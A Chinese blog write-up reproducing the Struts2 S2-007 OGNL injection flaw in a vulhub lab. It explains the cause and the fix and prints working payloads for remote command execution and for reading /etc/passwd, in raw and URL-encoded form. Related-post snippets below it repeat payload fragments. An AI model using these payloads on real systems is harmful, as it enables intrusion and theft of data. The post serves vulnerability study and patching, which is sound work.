漏洞复现----29、Struts2/S2-007

已于 2022-05-30 15:42:30 修改
阅读量1.2k 收藏 3
点赞数
分类专栏: # 漏洞复现 网络安全技术 文章标签: struts
于 2021-06-29 14:00:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/117567176
版权

文章目录

一、漏洞原理

S2-007漏洞一般出现在表单处。当配置了验证规则 <ActionName>-validation.xml时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似单引号拼接的方式即可注入任意 OGNL 表达式。

例如这里有一个 UserAction:

public class UserAction extends ActionSupport {
    private Integer age;
    private String name;
    private String email;

然后配置有 UserAction-validation.xml:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE validators PUBLIC
    "-//OpenSymphony Group//XWork Validator 1.0//EN"
    "http://www.opensymphony.com/xwork/xwork-validator-1.0.2.dtd">
<validators>
    <field name="age">
        <field-validator type="int">
            <param name="min">1</param>
            <param name="max">150</param>
        </field-validator>
    </field>
</validators>

当用户提交 age 为字符串而非整形数值时,后端用代码拼接 “'”+ value + "'"然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助单引号拼接的方式即可注入任意 OGNL 表达式。

影响版本
2.0.0 - 2.2.3

二、漏洞环境

docker-compose build
docker-compose up -d
访问:ip:8080

三、漏洞复现

3.1、利用方式一

绕过安全配置进行命令执行的 Payload

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@java.lang.Runtime@getRuntime().exec("open /Applications/Calculator.app")) + '

即为:

/user.action?name=looke&email=qq@qq.com&age=%27%20%2B%20(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40java.lang.Runtime%40getRuntime().exec(%22open%20%2FApplications%2FCalculator.app%22))%20%2B%20%27

3.2、利用方式二

文件读取:

/user.action?name=looke&email=qq@qq.com&age=%27%20%2b%20%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%23w%3Dnew%20java.io.File%28%22%2fetc%2fpasswd%22%29%2C@org.apache.commons.io.IOUtils@toString%28new%20java.io.FileInputStream%28%23w%29%29%29%20%2b%20%27

即为:

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,#w=new java.io.File("/etc/passwd"),@org.apache.commons.io.IOUtils@toString(new java.io.FileInputStream(#w))) + '

3.3、利用方式三

命令执行:

/user.action?name=looke&email=qq@qq.com&age=%27%20%2b%20%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27ls%20%2f%27%29.getInputStream%28%29%29%29%20%2b%20%27

即为:

/user.action?name=looke&email=qq@qq.com&age=' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls /').getInputStream())) + '

四、修复方案

struts2.2.3.1 对这个漏洞进行了修复,修复方法:类似于 sql 注入的 addslashes,对其中的单引号进行了转义,在 getOverrideExpr函数中进行了 StringEscape,从而无法闭合单引号,也就无法构造 OGNL 表达式。

参考链接:https://github.com/vulhub/

李沉肩
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
S2-007远程代码执行漏洞(CVE-2012-0838)
m0_65150886的博客
01-09 423
类似于 sql 注入的 addslashes,对其中的单引号进行了转义,在 getOverrideExpr函数中进行了 StringEscape,从而无法闭合单引号,也就无法构造 OGNL 表达式。如果类型验证转换失败,则服务器将拼接用户提交的表单值字符串,然后执行OGNL表达式解析并返回。1.访问http://ip:port,出现如下页面,开始实验。burp抓包,修改post请求,查找底层目录信息。当作OGNL表达式执行,从而导致了漏洞。导致错误,struts会将用户的输入。
Struts2 漏洞复现s2-007
weixin_51220765的博客
12-14 1080
Struts2 漏洞复现s2-007 原理: age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞 1.到007下 cd vulhub-master/struts2/s2-007 2.启动007 docker-compose up -d 3.访问靶机ip:8080 注意:如果此时报404错误,不要慌哦~ 我们去浏览器的历史记录里清除一下缓存,然后刷新一下页面就好了!具体步骤如下: 当页面回复正常后,我们就可以继续进行咯~ 3
Struts S2-007复现
ZJT6666666的博客
12-21 386
Struts S2-007复现
S2-007漏洞复现
baidu_38844729的博客
11-14 300
漏洞原理 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。 影响版本:Struts2 2.0.0 - Struts2 2.2.3 漏洞利用 访问页面 http://local...
vulhub-struts2-S2-007 远程代码执行漏洞复现
qq_56426046的博客
06-19 245
影响版本: 2.0.0 - 2.2.3。
『Java安全』Struts 2.2.3 表单参数类型转换错误OGNL注入漏洞S2-007复现与浅析
Ho1aAs‘s Blog
08-25 466
对表单参数使用validator验证时,如果遇到类型错误,参数值会先压入参数栈,之后会取出并被二次ognl解析。
S2-016/017漏洞工具 struts漏洞
02-26
本工具可以详细测试S2-016/017漏洞的资源,有助于您更深层的了解struts!
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
Struts2 最新漏洞 S2-016、S2-017 修补方案 Struts2 是一个基于 Java 的 Web 应用程序框架,由 Apache 软件基金会维护。最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者...
Struts2之拦截器原理分析及使用-上案例struts007
11-26
参考博文:http://blog.csdn.net/u011638419/article/details/41510483
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发现的。这个漏洞存在于Struts2的Jakarta插件中,该插件处理HTTP请求头中的Content-Type字段时存在缺陷。攻击者可以通过精心构造的HTTP请求,...
s2-007远程代码执行漏洞
Stephen Wolf
11-15 1913
一、漏洞简述: age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。 影响版本: 2.0.0 - 2.2.3 二、环境搭建 vulhub里搭建环境(我发表过好多关于struts2漏洞的环境搭建,这些具体步骤都类似,详情前参考s2-045) 三、漏洞复现 访问ip+80...
buuctf [struts2]s2-007
qq_1873822的博客
03-17 529
具体漏洞原理 https://xz.aliyun.com/t/2684 age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行。后端用代码拼接 “’” + value + “’” 然后对其进行 OGNL 表达式解析,比较类似SQL注入单引号闭合,插入语句,官方修复的时候也跟sql注入比较相似,escape 对单引号转义. poc ’ + (#_memberA.
墨者学院_Apache Struts2远程代码执行漏洞(S2-007)复现
cc_de_csdn的博客
08-26 9827
打开靶场,任意填写表单并提交 使用BrupSuite捕获报文 修改age的值为: %27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccesso...
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-007(CVE-2012-0838)
qq_51577576的博客
10-13 1415
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-007(CVE-2012-0838) S2-007S2-003、S2-005的漏洞源头都是一样的,都是struts2对OGNL的解析过程中存在漏洞 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式
Apache Struts2远程代码执行漏洞(S2-007)复现
qq_42283440的博客
09-05 6664
经百度得知S-007漏洞原理,年龄框改为payload,在age的value部分进行命令执行 %27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAc...
s2系列——s2-007,s2-008,s2-009复现
qq_54030686的博客
03-02 3381
s2-007,s2-008,s2-009复现 简而言之就是payload的输入,具体复现这里不再复现,相关博文,也有蛮多,这里更新下脚本 s2-007 def s2007(url): try: proxy = '192.168.43.74:8080' # 本地代理 proxies = { 'http': 'http://' + proxy, 'https': 'https://' + proxy }
s2-005漏洞复现
最新发布
10-05
s2-005漏洞是指在Struts2框架中存在的一个安全漏洞。该漏洞的原理是Struts2会将HTTP请求中的每个参数名解析为OGNL表达式进行执行。攻击者可以通过编码绕过安全限制,执行恶意的代码。 该漏洞的影响版本是Struts 2.0.0-2.1.8.1。你可以在vulhub的GitHub仓库中找到搭建了该漏洞的示例环境。首先,你可以使用能够爆出路径的payload验证目标网址是否存在s2-005漏洞。然后,使用执行代码的payload进行利用。需要注意的是,不同的博主可能会提供不同的payload,所以如果一个payload无法利用,可以尝试其他的payload。 关于具体的漏洞复现步骤和细节,请参考相关资源和教程。由于时间和篇幅的限制,无法提供完整的复现过程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值